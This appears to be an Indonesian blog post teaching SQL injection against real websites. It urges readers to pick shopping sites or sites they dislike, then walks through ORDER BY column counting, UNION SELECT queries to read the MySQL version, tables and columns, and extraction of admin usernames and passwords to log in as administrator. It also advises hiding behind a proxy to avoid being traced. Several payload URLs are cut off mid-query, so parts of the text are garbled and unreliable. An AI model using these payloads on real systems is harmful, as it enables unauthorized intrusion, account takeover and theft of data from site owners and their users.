Cari Di google Ato Search Engine Lain Nya Situs" Shopping ato Site Yg u Benci..
Misalkan kita mendapatkan target
http://www.target.com/news.php?id=5
Sekarang kita test ada kutunya g tuh website dengan menambahkan di url’
contoh http://www.target.com/news.php?id=5'
maka akan muncul error
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
ATAU YG Mendekati
Itu berarti kita bisa gunakan Sql Injection
2). Mencari nomor dari kolom
Untuk mencari nomor dari kolom kita menggunakan perintah ORDER BY
Kita melakukan perurutan nomor sampai ada error
http://www.target.com/news.php?id=5+order+by+1%2F* <– no error
http://www.target.com/news.php?id=5+order+by+2%2F* <– no error
http://www.target.com/news.php?id=5+order+by+3%2F* <– no error
http://www.target.com/news.php?id=5+order+by+4%2F* <– error (kita akan mendapatkan pesan seperti Unknown column ‘4' in ‘order clause’ atau sesuatu seperti itu…ya gitu degh ( )
Berarti kita mendapatkan kolomnya, ya itu 3, karena di 4 error.
Sedikit penjelasan, dalam penggunaan ORDER BY kita mencari pertemuan dimana website itu menjadi error dan tidak, setelah itu mendapatkannya, kita ambil yg tidak erorr terakhir sebelum keluar error.
3). Menggunakan fungsi UNION
Dengan menggunakan UNION kita dapat memilih lebih banyak data dalam satu statemen sql.
Jadi kita mendapatkan
http://www.target.com/news.php?id=5+UNION+SELECT+1
Sekarang lihat pada artikel, artikelnya akan berubah jadi nomor 1 atau 2 atau 3 atau keluar semuanya, itu lah gunanya UNION
4). Check versi dari MySQL
http://www.target.com/news.php?id=5+union+select+1
NOTE: jika /* tidak bisa atau terjadi error, coba dengan –
ini merupakan suatu komentar penting bagi query kita untuk bekerja dengan baik.
Misalkan kita mendapatkan nomor 2 di dalam tampilan, sekarang kita cek verisinya
kita buang nomor 2, ganti dengan version() atau @@version nanti akan mendapatkan seperti 4.1.33-log atau 5.0.45 atau yang mendekati.
Contoh tampilan : http://www.target.com/news.php?id=5+union+select+1,@@version,3/*
Jika kamu mendapatkan error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
Yang kita butuhkan adalah fungsi convert()
contoh :
http://www.target.com/news.php?id=5+union+select+1
atau dengan hex() dan unhex()
contoh :
http://www.target.com/news.php?id=5+union+all+sele
dan kamu akan mendapatan versi MySql D
5). Mendapatkan table dan nama column
Jika versi MySQL adalah 5 (contoh : 5.0.45, 5.0.51a-community…)
– Mencari Table
Contoh Nomor yang keluar ada 2, jadi kita masukan perintah injekan di nomor 2
http://www.target.com/news.php?id=5+union+select+1
Untuk melihat table selanjutnya kita rubah limit+0,1/* menjadi limit+1,1/* lalu limit+2,1/* dst.
Sampai tabel yang dinginkan, contoh table admin
– Mencari Column
Sekarang kita cari column pada table admin
http://www.target.com/news.php?id=5+union+select+1
Setandarnya bisa menggunakan itu jika quotenya off, tetapi jika quote on nama table harus di encode dengan hexa
admin = 61646D696E
Untuk dapat di baca oleh perintah SQL, harus di tambahakan 0x sihingga menjadi 0×61646D696E
http://www.target.com/news.php?id=5+union+select+1
Untuk melihat colum selanjutnya tinggal merubah limitnya seperti table diatas.
Contoh column yang keluar username dan password
Sekarang kita lihat datanya
http://www.target.com/news.php?id=5+union+select+1
Contoh data yang keluar : admin
http://www.target.com/news.php?id=5+union+select+1
Contoh data yang keluar : p45w0rd
sekarang kita harus menyelesaikan query biar terlihat bagus )
untuk itu kita menggunakan fungsi concat() (merupakan penggabungan strings)
contoh :
http://www.target.com/news.php?id=5+union+all+sele
catatan : 0×3a, adalah nilai hex dari 3a, sedangkan 0x merupakan tambahan untuk dapat di baca oleh URL
(ada cara lain untuk itu dengan menggunakan, char(5Cool, merupakan dari nilai decimal )
http://www.target.com/news.php?id=5+union+all+sele
Maka akan muncul tampilan data : admin:p45w0rd
Klo Brhasil brarti Langsung Login Aja Ke Admin
dengan user and pass yg udapet tadi..
Sekian Thanks... (Green winner's)
(untuk melakukan teknik diatas jangan lupa pakai proxy untuk menutupi identitas kamu biar ga dapat di lacak) --> cara pakai proxynya cari aja di google atau tunggu info berikutnya..
Resiko Di tanggung Sendiri.. !! (^_^)
Tidak ada komentar:
Posting Komentar